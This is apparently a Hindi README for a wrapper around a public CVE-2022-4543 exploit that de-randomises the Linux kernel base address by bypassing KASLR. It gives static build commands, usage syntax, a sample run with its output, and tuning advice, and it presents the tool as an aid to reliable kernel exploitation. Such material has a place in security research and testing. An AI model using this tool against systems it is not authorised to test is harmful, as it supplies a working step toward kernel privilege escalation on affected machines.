
CVE-2022-4543 एक्सप्लॉइट के लिए रैपर जो KASLR बाईपास के माध्यम से कर्नेल आधार पते को डी-रैंडमाइज़ करता है, जो प्रभावित Linux सिस्टम पर विश्वसनीय कर्नेल शोषण को सक्षम बनाता है।
यह willsroot के CVE-2022-4543 एक्सप्लॉइट का एक रैपर है, जो आपको कर्नेल बेस पता (kernel base address) आंकने और प्राप्त करने में मदद करता है।
आपकी आवश्यकता के आधार पर (वैकल्पिक):
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main
कुछ OS के लिए, पहले static libc स्थापित करें।
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200
दोनों प्रोग्राम चलाने के बाद, यह आपको आपके ऑफसेट के आधार पर सबसे अधिक बार आने वाला पता देगा।
व्यवहार में, वास्तविक कर्नेल बेस पता कुल प्रयासों में 1/4 से अधिक बार दिखाई देगा। 100 से अधिक प्रयास करने की अनुशंसा की जाती है।